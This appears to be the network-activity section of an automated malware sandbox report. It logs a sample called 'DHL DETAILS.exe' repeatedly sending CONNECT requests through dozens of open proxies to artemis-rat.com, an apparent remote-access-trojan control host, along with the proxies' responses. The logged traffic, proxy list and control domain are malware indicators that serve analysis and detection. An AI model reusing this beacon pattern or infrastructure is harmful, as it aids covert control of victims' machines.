Mar 9, 2024 13:14:19.333247900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
999	192.168.2.5	53050	192.252.216.81	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.332663059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1000	192.168.2.5	52435	51.222.241.157	30011	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.332665920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1001	192.168.2.5	50739	138.36.199.14	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.333108902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1002	192.168.2.5	52428	92.204.135.37	58604	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.335525036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.380122900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.380707026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.380186081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1003	192.168.2.5	52300	45.11.95.165	5219	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.335611105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1004	192.168.2.5	53091	104.18.81.76	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.335675001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781301975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.936193943 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1005	192.168.2.5	53044	202.162.219.10	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.336605072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1006	192.168.2.5	53108	162.159.242.62	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.336606026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.833240986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.994244099 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1007	192.168.2.5	53066	129.213.150.205	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.336787939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1008	192.168.2.5	52457	92.205.110.47	17158	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.339895964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.536355019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1009	192.168.2.5	53126	132.148.245.169	38780	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.339988947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.833352089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.333511114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333523989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1010	192.168.2.5	50833	162.241.158.204	50563	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.340342999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.333273888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1011	192.168.2.5	53138	104.17.50.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.342999935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.499794006 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1012	192.168.2.5	51000	164.92.86.113	57391	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.353552103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.380120993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1013	192.168.2.5	53055	51.15.247.93	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.356024027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1014	192.168.2.5	52404	200.174.198.95	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.360259056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.810508966 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:32.762672901 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:33.845633984 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1015	192.168.2.5	53171	104.20.198.49	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.360719919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.515435934 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1016	192.168.2.5	53191	185.238.228.96	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.386589050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.543577909 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1017	192.168.2.5	53190	104.25.58.39	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.386591911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.543715000 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1018	192.168.2.5	50914	162.241.6.97	44607	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.387029886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.567462921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1019	192.168.2.5	53175	65.49.38.202	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.387088060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.561243057 CET	536	IN	HTTP/1.1 503 Service Unavailable Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3978 X-Squid-Error: ERR_CANNOT_FORWARD 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1020	192.168.2.5	53216	104.21.31.189	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.387548923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.543697119 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1021	192.168.2.5	52965	47.91.65.23	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.387880087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.517338991 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1022	192.168.2.5	52876	123.56.1.50	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.387887001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.973722935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1023	192.168.2.5	53134	129.213.150.205	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.390558958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1024	192.168.2.5	53048	212.108.155.205	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.394428015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1025	192.168.2.5	51848	111.20.217.178	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.397655010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.567485094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1026	192.168.2.5	53247	172.67.181.97	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
